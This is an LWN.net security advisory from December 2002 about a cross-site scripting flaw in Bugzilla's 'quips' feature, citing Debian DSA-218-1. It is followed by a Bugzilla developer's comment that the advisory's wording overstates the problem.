bugzilla - cross site scripting [LWN.net]

Package(s):

bugzilla

CVE #(s):

Created:

December 30, 2002

Updated:

January 1, 2003

Description:

A cross site scripting vulnerability has been reported for Bugzilla, a web-based bug tracking system. Bugzilla does not properly sanitize any input submitted by users. As a result, it is possible for a remote attacker to create a malicious link containing script code which will be executed in the browser of a legitimate user, in the context of the website running Bugzilla. This issue may be exploited to steal cookie-based authentication credentials from legitimate users of the website running the vulnerable software.

This vulnerability only affects users who have the 'quips' feature enabled and who upgraded from version 2.10.

Alerts:

Debian

DSA-218-1

2002-12-30

(Log in to post comments)

bugzilla - cross site scripting

Posted Jan 9, 2003 9:44 UTC (Thu) by gerv (subscriber, #3376) [Link]

Debian rewrote the original Bugzilla advisory so it is now seriously misleading. The sentence "Bugzilla does not properly sanitize any input submitted by users." is absolutely not correct. Bugzilla takes great care to sanitise user input. A better sentence might be:

"For a period up to two years ago, Bugzilla did not properly sanitize quips submitted by users."

At the time, this was a feature, not a bug, but the use of HTML in quips had to be restricted due to abuse. However, we didn't write code to clean up any quips already in the database. So, if you get hit with a cross-site scripting attack, then the malicious party must have added it to your Bugzilla two years ago.

The chance of this vulnerability actually affecting anyone is miniscule.

Gerv
(Bugzilla developer)